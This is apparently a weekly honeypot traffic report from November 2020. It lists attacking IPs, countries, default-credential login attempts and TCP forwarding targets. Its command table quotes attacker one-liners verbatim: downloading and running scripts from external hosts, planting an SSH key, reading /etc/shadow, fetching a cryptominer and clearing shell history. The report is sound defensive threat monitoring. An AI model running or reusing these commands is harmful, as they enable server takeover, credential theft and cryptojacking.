Honey Pot – Previous Week 1st November 2020.

This week we saw an increase in attack from the previous week across the Honey Pot. The number of countries attacking the Honey Pot increased by 1. The number of user combos being used has increased 10 fold. The number of commands and TCP forward requests also increased.

Total attacking IPs: 1069
Total Countries: 72
Total User/pass successful combos: 6427
Total Commands ran: 280
Total TCP Forward requests : 17307

Again this week we see two Botnet one from Ireland and the other from Russia dominating the requests with a combined 64,119 requests from 5.188.86.0/24 (Ireland) and 33,626 requests from 5.188.87.0/24 (Russia), These two botnets accommodate for 18 of the top 30 IP’s hitting the Botnet

geoiplookup 5.188.87.49 GeoIP Country Edition: RU, Russian Federation GeoIP City Edition, Rev 1: RU, 66, Saint Petersburg City, Saint Petersburg, 190826, 59.894402, 30.264200, 0, 0 GeoIP ASNum Edition: AS57172 Global Layer B.V.

geoiplookup 5.188.86.49 GeoIP Country Edition: IE, Ireland GeoIP City Edition, Rev 1: IE, 04, Cork, Macroom, P12, 51.900002, -8.950000, 0, 0 GeoIP ASNum Edition: AS49453 Global Layer B.V.

Both Botnet’s are hosted by Global Layer B.V which are a global hosting provider with Data Centers in multiple countries. Doing a google search on ‘Global Layer B.V’ you can see there is some known malicious traffic coming from their network.

TOP 30 Attacking IP’s

7044 5.188.87.49
7025 5.188.86.221
7014 163.172.19.226
6998 188.166.89.44
6281 5.188.86.167
6238 5.188.86.168
6067 5.188.86.165
5951 5.188.87.57
5913 45.227.255.207
5896 5.188.86.207
5853 5.188.87.58
5823 45.227.255.206
5747 5.188.86.169
5641 5.188.86.178
5617 5.188.87.60
5575 45.227.255.162
5371 5.188.86.210
5296 5.188.86.216
5165 5.188.86.206
5098 195.154.146.3
5021 39.107.255.148
4965 5.188.87.51
4196 5.188.87.53
3860 5.188.86.212
3276 45.227.255.161
2468 218.76.218.7
2075 14.152.73.14
1697 88.214.26.91
1532 5.188.86.164
1325 45.227.255.208

Looking at the countries attacking the Botnet for the second week in a row we see China and the United States dominating the attacks. Followed by France and Russia. We see that the number of IP’s from Ireland stays the same and Russia has dropped by 2.

288 China
177 United States
57 France
51 Russia
45 Germany
37 Brazil
35 Singapore
33 South Korea
32 Netherlands
31 Hong Kong
22 India
18 Ireland
18 Canada
18 Vietnam
12 Taiwan
11 Panama
11 United Kingdom
11 Sweden
10 Indonesia
10 Republic of Lithuania
10 Argentina
9 Mexico
8 Colombia
7 Japan
7 Romania
7 South Africa
6 Italy
6 Spain
5 Thailand
5 Poland

Still Root/Admin dominates the top login to the platform with a whopping 128,612 requests this is 430x greater then root/root at 299 requests.

128612 root/admin
299 root/root
265 root/1234
81 root/123456
75 root/111111
67 root/1234567
62 root/12345
61 root/password
49 root/12345678
47 root/123

We see echo -e "\x6F\x6B" being the top command ran again this week, We see the continue use of Thorbins.sh. Bot.pl has also been disabled before we had a chance to analyze the content.

TOP 30 Commands

5019 echo -e “\x6F\x6B”
1080 uname -a
903 uname -s -v -n -r
680 uname -a;nproc
485 nproc
197 w
193 top
191 cat /proc/cpuinfo | grep name | wc -l
191 cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
191 free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’
191 ls -lh $(which ls)
191 which ls
191 crontab -l
191 uname -m
191 cat /proc/cpuinfo | grep model | grep name | wc -l
191 uname
190 lscpu | grep Model
185 cd ~ && rm -rf .ssh && mkdir .ssh && echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
144 cat /etc/issue
84 uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;wget http://27.111.44.72/authorized_keys -O /root/.ssh/authorized_keys;wget -qO – http://tung-shu.cf/o|perl;wget http://tung-shu.cf/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x
71 uname -a && nproc
68 cat /etc/issue ; wget 45.153.203.209/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 45.153.203.209/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
49 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.14.224.170/h3lln3t.sh; curl -O http://45.14.224.170/h3lln3t.sh; chmod 777 h3lln3t.sh; sh h3lln3t.sh; tftp 45.14.224.170 -c get h3lln3t.sh; chmod 777 h3lln3t.sh; sh h3lln3t.sh; tftp -r h3lln3t2.sh -g 45.14.224.170; chmod 777 h3lln3t2.sh; sh h3lln3t2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.14.224.170 h3lln3t1.sh h3lln3t1.sh; sh h3lln3t1.sh; rm -rf h3lln3t.sh h3lln3t.sh h3lln3t2.sh h3lln3t1.sh; rm -rf *
40 /usr/bin/tar Pxvf –
36 cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
33 cat /etc/issue ; wget 35.203.175.171/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 35.203.175.171/bot.pl ; perl bot.pl ; history -c ; rm -rf bot.pl
33 uname -a & cat /proc/version
30 scp -t /var/tmp/clamav.pl
30 perl /var/tmp/clamav.pl;rm -rf /var/tmp/clamav.pl
29 nc 1 1;cat /etc/issue; wget https://nasapaul.com/cnrig; ./cnrig;

We still see in an increase of attacks to ya.ru, The attack has increased just under 20,000 requests, We continue see the attack on evernote.com. Overall all TCP Forward requests have increased over the past week.

TOP 30 TCP Forward Requests

95149 ya.ru:80
13917 www.evernote.com:443
8001 oauth.vk.com:443
7761 opfcaptcha-prod.s3.amazonaws.com:443
7461 youtube.com:443
6212 51.159.19.168:80
5790 www.amazon.com:443
4786 iforgot.apple.com:443
4720 api.sendspace.com:443
4640 www.google.com:443
4282 69.195.128.18:80
4093 soundcloud.com:443
3204 omegle.com:80
3160 184.30.189.5:443
3072 ip.bablosoft.com:80
3010 96.43.128.70:80
2434 idmsa.apple.com:443
2307 accounts.ea.com:443
2068 m.youtube.com:443
1866 authserver.mojang.com:443
1732 work.a-poster.info:25000
1565 appleid.apple.com:443
1527 www.youtube.com:443
1378 www.wish.com:443
1270 www.google.co.uk:443
1186 steamcommunity.com:443
1145 89.39.105.12:80
1086 join.nexon.com:443
1076 13.32.57.69:443
1036 www.walmart.com:443